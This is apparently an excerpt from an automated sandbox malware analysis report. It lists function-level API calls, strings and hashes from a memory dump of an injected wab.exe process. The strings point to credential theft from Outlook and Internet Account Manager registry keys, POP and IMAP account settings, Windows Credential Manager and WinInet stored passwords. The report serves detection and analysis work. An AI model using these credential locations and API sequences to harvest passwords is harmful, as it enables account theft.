                                                                                  • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                  • API String ID: 2360744853-2229823034
                                                                                  • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                  • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                  • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                  • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                  • memset.MSVCRT ref: 00402C9D
                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                  • memset.MSVCRT ref: 00402CF7
                                                                                  • sprintf.MSVCRT ref: 00402D10
                                                                                  • sprintf.MSVCRT ref: 00402D4E
                                                                                    • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                    • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Closememset$sprintf$EnumOpen
                                                                                  • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                  • API String ID: 1831126014-3814494228
                                                                                  • Opcode ID: 0a74fa32d67bcbbc313bb9d475b1a51825b482d692cab0296bf401a07d6f2bf5
                                                                                  • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                  • Opcode Fuzzy Hash: 0a74fa32d67bcbbc313bb9d475b1a51825b482d692cab0296bf401a07d6f2bf5
                                                                                  • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • strchr.MSVCRT ref: 004100E4
                                                                                  • _mbscpy.MSVCRT ref: 004100F2
                                                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                    • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                  • _mbscpy.MSVCRT ref: 00410142
                                                                                  • _mbscat.MSVCRT ref: 0041014D
                                                                                  • memset.MSVCRT ref: 00410129
                                                                                    • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                    • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                                                                  • memset.MSVCRT ref: 00410171
                                                                                  • memcpy.MSVCRT ref: 0041018C
                                                                                  • _mbscat.MSVCRT ref: 00410197
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                  • String ID: \systemroot
                                                                                  • API String ID: 912701516-1821301763
                                                                                  • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                  • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                  • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                  • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$strlen
                                                                                  • String ID: -journal$-wal$immutable$nolock
                                                                                  • API String ID: 2619041689-3408036318
                                                                                  • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                  • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                  • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                  • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@$strlen
                                                                                  • String ID:
                                                                                  • API String ID: 4288758904-3916222277
                                                                                  • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                  • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                  • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                  • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                  • wcslen.MSVCRT ref: 0040874A
                                                                                  • _wcsncoll.MSVCRT ref: 00408794
                                                                                  • memset.MSVCRT ref: 0040882A
                                                                                  • memcpy.MSVCRT ref: 00408849
                                                                                  • wcschr.MSVCRT ref: 0040889F
                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                                                                  • String ID: J$Microsoft_WinInet
                                                                                  • API String ID: 2203907242-260894208
                                                                                  • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                  • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                  • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                  • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                  • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                  • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                  • memcpy.MSVCRT ref: 00410961
                                                                                  Strings
                                                                                  • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                  • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                  • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                  • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: FromStringUuid$memcpy
                                                                                  • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                  • API String ID: 2859077140-2022683286
                                                                                  • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                  • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                  • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                  • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406CA1
                                                                                  • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406CBF
                                                                                  • strlen.MSVCRT ref: 00406CCC
                                                                                  • _mbscpy.MSVCRT ref: 00406CDC
                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406CE6
                                                                                  • _mbscpy.MSVCRT ref: 00406CF6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                  • String ID: Unknown Error$netmsg.dll
                                                                                  • API String ID: 2881943006-572158859
                                                                                  • Opcode ID: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                  • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                                                  • Opcode Fuzzy Hash: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                  • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                  • _mbscpy.MSVCRT ref: 00409686
                                                                                  • _mbscpy.MSVCRT ref: 00409696
                                                                                  • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                    • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                  • API String ID: 888011440-2039793938
                                                                                  • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                  • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                  • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                  • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  • database is already attached, xrefs: 0042EA97
                                                                                  • database %s is already in use, xrefs: 0042E9CE
                                                                                  • too many attached databases - max %d, xrefs: 0042E951
                                                                                  • out of memory, xrefs: 0042EBEF
                                                                                  • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                  • unable to open database: %s, xrefs: 0042EBD6
                                                                                  • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpymemset
                                                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                  • API String ID: 1297977491-2001300268
                                                                                  • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                  • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                  • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                  • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A3E
                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A4C
                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A5D
                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A74
                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A7D
                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00409C53
                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00409C6F
                                                                                  • memcpy.MSVCRT ref: 00409C97
                                                                                  • memcpy.MSVCRT ref: 00409CB4
                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00409D3D
                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00409D47
                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00409D7F
                                                                                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                    • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                                                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                                                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                  • String ID: 0wE$d
                                                                                  • API String ID: 2915808112-1552800882
                                                                                  • Opcode ID: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                  • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                                                  • Opcode Fuzzy Hash: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                  • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                  • strchr.MSVCRT ref: 0040327B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileStringstrchr
                                                                                  • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                  • API String ID: 1348940319-1729847305
                                                                                  • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                  • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                  • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                  • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy
                                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                  • API String ID: 3510742995-3273207271
                                                                                  • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                  • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                  • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                  • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                  • memset.MSVCRT ref: 0040FA1E
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                  • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                  • String ID: WindowsLive:name=*$windowslive:name=
                                                                                  • API String ID: 945165440-3589380929
                                                                                  • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                  • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                  • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                  • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                    • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                    • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                                                                                  • strchr.MSVCRT ref: 0040371F
                                                                                  • _mbscpy.MSVCRT ref: 00403748
                                                                                  • _mbscpy.MSVCRT ref: 00403758
                                                                                  • strlen.MSVCRT ref: 00403778
                                                                                  • sprintf.MSVCRT ref: 0040379C
                                                                                  • _mbscpy.MSVCRT ref: 004037B2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                                                                  • String ID: %s@gmail.com
                                                                                  • API String ID: 500647785-4097000612
                                                                                  • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                  • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                  • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                  • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004094C8
                                                                                  • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                  • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                  • memset.MSVCRT ref: 0040950C
                                                                                  • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                  • _strcmpi.MSVCRT ref: 00409531
                                                                                    • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                  • String ID: sysdatetimepick32
                                                                                  • API String ID: 3411445237-4169760276
                                                                                  • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                  • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                  • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                  • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                  • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                  • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                    • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                    • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                    • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                  • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Item$DialogMessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 2485852401-0
                                                                                  • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                  • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                  • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                  • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                  • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                  • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                  • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                  • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                  • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                  • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                  • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                  • String ID:
                                                                                  • API String ID: 3642520215-0
                                                                                  • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                  • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                  • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                  • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
